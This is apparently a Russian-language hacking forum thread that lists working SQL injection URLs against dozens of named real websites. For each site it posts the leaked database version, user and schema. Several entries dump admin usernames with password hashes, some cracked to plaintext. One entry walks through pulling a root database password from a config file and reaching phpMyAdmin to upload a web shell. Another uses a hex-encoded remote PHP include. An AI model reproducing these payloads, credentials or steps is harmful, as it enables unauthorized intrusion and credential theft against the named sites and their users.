SQL Инъекции

http://www.lancia.ro/noutati.php?id=-35+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,version(),database(),user()),9

Database Version: 5.0.67-community
Database name: lancia2_content2
User name: lancia2_admcon@localhost

 

www.allbiz.com.my Pr-4 - какой то шоп или что типо того

PHP:

http://www.allbiz.com.my/details3.php?ID=35&cid=223123123+union+select+1,2,3,concat_ws(0x3A,user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+--+&type=P


user:allbiz_mago@localhost
version:5.0.45-community
database:allbiz_portal

PHP:

http://www.allbiz.com.my/details3.php?ID=35&cid=223123123+union+select+1,2,3,concat_ws(0x3A,user_name,password,level_access,status),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+allbiz_portal.admin_table+limit+0,1--+&type=P


danny:37b7db0c3712a78e46046d78fff8b72a:d9:3:1 - danny:d9dojo1234

hang:ab50db46cef89a0a40d7efb4b39e75d0:33:3:1 - hang:3311111111

сюда пассы не подходят http://www.allbiz.com.my/admin/signmein.php, кому надо можети порыться

 

http://vantulschimbarii.ro/petitie.php?act=w&id=4+AND+ASCII(SUBSTRING((select+version()),1,1))=x

x=53,46,48,46,54,55,45,99,111,109,109,117,110,105,116,121,45,108,111,103

http://vantulschimbarii.ro/petitie.php?act=w&id=4+AND+ASCII(SUBSTRING((select+database()),1,1))=x

x=118,97,110,116,117,108,115,99,95,109,97,103,111,114


http://vantulschimbarii.ro/petitie.php?act=w&id=4+AND+ASCII(SUBSTRING((select+user()),1,1))=x

x=118,97,110,116,117,108,115,99,95,109,97,103,111,114,64,108,111,99,97,108,104,111,115,116

Version : 5.0.67-community-log
Database : vantulsc_magor
User : vantulsc_magor@localhost

 

Pagerank: 4
тИЦ: 500

Code:

http://www.fotik.com/one_news.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version( ),database(),us er()),8,9,10,11,12--

Database Version : 5.0.51a-community
Database name : db_fotik1
User name : fotik1@localhost


юзвери :

Code:

http://fotik.com/one_news.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user_name,user_ pass),8,9,10,11,12+from+users+limit+0,1--

adm :

Code:

http://fotik.com/one_news.php?id=-1+union+select+1,2,3,4,5,6,conca t_ws(0x3a,name,pass),8,9,10,11,12+from+use r_site+limit+0,1--

Code:

Viktor:radio

 

www.unitedoneproductions.org

Code:

http://www.unitedoneproductions.org/news.php?ax=v&n=11&id=7&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5--

version: 4.1.22-standard
user: unitedon_user@localhost
database: unitedon_data

 

http://www.standardsuk.com/shop/products_view.php?prod=-37590+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,count(concat_ws(0x3a,email,password)),database(),version(),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+users--

 

Налетай!

Code:

http://www.mbleague.at/game.php?ID=-1+union+all+select+0,1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10,11,12--

Code:

4.1.21-max-log:d006343d@localhost:d006343d

-----------------

Code:

http://www.transportforum.at/read.php?id=-1+union+all+select+0,1,convert(concat_ws(0x3a,version(),user(),database())+using+latin1),3,4,5--

Code:

4.1.10a:transport790ma@localhost:transportforum_at_-_news

----------------------------

Code:

http://www.styx-partners.com/at/view.php?id=-1+union+all+select+0,1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10--

Code:

5.0.45:styx-partners@localhost:styx-partners

--------------------------------

Code:

http://www.cameogolf.com/se/category.php?Id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3--

Code:

4.0.16-standard:apache@localhost:cameogol_1

-------------------------

Code:

http://www.wrcb.se/newsid.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),user(),database()),3--

Code:

5.0.32-Debian_7etch8-log:[email protected]:wrcb_se

----------------------

Code:

http://www.idrottshuset.se/readnews.php?ID=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8--

Code:

5.0.33-log:ih@localhost:ih

-------------------------------------------

Code:

http://www.kanalsyd.se/event.php?id=-1+union+all+select+0,1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10--

Code:

5.0.45-log:kanalsy_se@[email protected]:kanalsyd_se

---------------------

Code:

http://www.universalmusic.se/labels.php?id=-1+union+all+select+0,1,2,concat_ws(0x3a,version(),user(),database()),4--

Code:

4.1.22-standard-log:umusic@localhost:universalmusic

--------------

Code:

http://www.roxyrecordings.se/news.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3,4,5,6--

Code:

4.1.18:rox

------------------------------------
The End!

 

christmasgifts.com

Code:

http://www.christmasgifts.com/sub-cat.php?ID=-90+union+select+1,version(),3,4,5

4.1.20

 

http://www.fad.ro/detalii.php?id=9128+UNION+SELECT+concat_ws(0x3a,version(),database(),user()),2,3,null,5,6,null,8--


Database Version: 5.0.67-community
Database name: fad_futurearfad
User name: fad_fad@localhost

 

Pagerank: 5
тИЦ: 375

Code:

http://www.byttehnika.ru/?action=print_news_body&id_news=1+union+select+concat_ ws(0x3a,version(),database(),user()),2,3,4--

Database Version : 5.0.38-Ubuntu_0ubuntu1.4-log
Database name : 003ru
User name : 003ru@localhost

adm:

Code:

http://www.byttehnika.ru/?action=print_news_body&id_news=1+union+select+concat_ws(0x3a,User ,password),2,3,4 +from+user+limit+1,1--

Code:

003ru_select:095fa070006515cf

 

Куяк!

http://www.ricosrl.ro

Крутится на 4м мускуле. Хитрый администратор сдул подчистую эту партию.

Дыра:
http://www.ricosrl.ro/lucrari/lucrare.php?lucrare=-1+union+select+concat_ws(0x3a3a,User,password,user()),2,3+from+mysql.user/*

Таблицы не подбрутились, но чудо-юзер имеет FILE_PRIV = YES. Порывшись в скриптах, находим конфиг и в нем:

define('_HOST','localhost');
define('_USER','root');
define('_PASS','rico1991');
define('_DATABASE','photon_rico');

Детально изучив файлы отвечающие за аутентификацию - видим, что логин жестко забит в скрипте, а именно:
login: user
Пароль же берется от регов указанных в конфиге к БД:
pass: rico1991


http://www.ricosrl.ro/administrare/ <- сама админка

Но админка беспонтовая и шелл через нее не залить, поэтому смотрим дальше.

http://www.ricosrl.ro/admin/ <- лежит пхпмайадмин

Берем реги из конфига и коннектимся.

Как залить шелл далее понятно =)

 

бедный сайт( мне его жалко(( Что с ним будет...

 

travel.chinavista.com pr 5

Code:

http://travel.chinavista.com/show_culture.php?id=-7%20union%20select%201,concat_ws(0x23,database(),user(),version()),3,4,5,6,7

entravel#dedop@localhost#5.0.45

adminka
http://travel.chinavista.com/admin/ basic

memberka

http://travel.chinavista.com/guide-login.php

www.colinst.com pr 5

Code:

http://www.colinst.com/brief.php?id=-6%20union%20select%201,2,3,4,5,concat_ws(0x23,database(),user(),version())

colinsttest#root@localhost#5.0.67

http://www.colinst.com/admin/

root#*9F65C210660F2E3F11A0BCDA6F368888B00A97C7

 

http://www.antichitati.ro/oferta_produse.php?ID=-4'+union+select+1,2,3,4,concat_Ws(0x3a,version(),database(),user()),6,7/*


Database Version: 4.1.20-log
Database name: antichitati
User name: antichitati@localhost

 

www.ukrtexzbut.com.ua

Code:

http://www.ukrtexzbut.com.ua/index.php?page=200%27&id=-30+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12--%20&tovar=7_16

version: 5.0.67-community-log
user: ukrtexzb_scalibu@localhost
database: ukrtexzb_poshyk

 

Pagerank: 4
тИЦ: 300

Code:

http://www.giacint.ru/inside.php?action=price&pid=4265&id=4274+union+select+1,2,3,concat_ws(0x3a,version(),databas e(),user( )),5,6,7,8,9,10,11,12,13,14--

Database Version : 5.0.75
Database name : giacintf_f
User name : giacintf_f@localhost

юзвери выводятся без лимита, но админа я там не нашел :

Code:

http://www.giacint.ru/inside.php?action=price&pid=4265&id=4274+union+select+1,2,3,concat_ws(0x3a,nik,pwd,email),5,6,7,8,9,10,11,12,13,14+from+gia _otzivusers--

админка, вдруг пригодится:

Code:

http://www.giacint.ru/cpanel/

 

Code:

http://www.chapalain.li/sNews/index.php?id=-31+union+select+1,version(),3,4,5,6,7,8,9,10,11--

Code:

http://www.944.li/gaestebuch/kommentar.php?id=-85+union+select+1,2,3,4,version(),user(),7,8,9,10,11,12,13,14,15--

Вроде 5-я версия MySQL, а вот таблицы выводить не хочет((

 

Code:

http://www.hdip.com.pk/index.php?id=-1+union+all+select+0,1,concat_ws(0x3a,id,login,password),3,4+from+admin--

ид/логин/пасс:

Code:

1:admin:admin

Code:

http://www.hdip.com.pk/index.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),user()%20,database()),3,4--

юзер/версия/бд:

Code:

5.0.51a-community-log:[email protected]:hdip

-------------------------------------------------------------------
The End!

 

www.akusherstvo.ru Pr-5 ТиЦ 2700

PHP:

http://www.akusherstvo.ru/magaz.php?action=cat_show&ordby=type&type_active=212321+union+select+concat_ws(0x3A,user(),version(),database()),2--+


user:jakAkush@localhost
version:5.0.32-Debian_7etch8
database:jakza_akush

PHP:

http://www.akusherstvo.ru/magaz.php?action=cat_show&ordby=type&type_active=212321+union+select+concat_ws(0x3A,admin_login,admin_pass),2+from+jakza_akush.admin--+


jak : pak

www.shogunclub.ru ТиЦ-300 SQL injection+php include

PHP:

http://www.shogunclub.ru/kendo.php?ArticleID=-312317+union+select+1,2,3,4,5,6,0x687474703a2f2f73686172612d64612e6d6f792e73752f696e636c7564652e696e63,8,9,10--+


 

http://f-online.ru/newsr.php?id=-1+union+select+1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4+--+

fairytal_results@localhost:fairytal_results:5.0.51a-community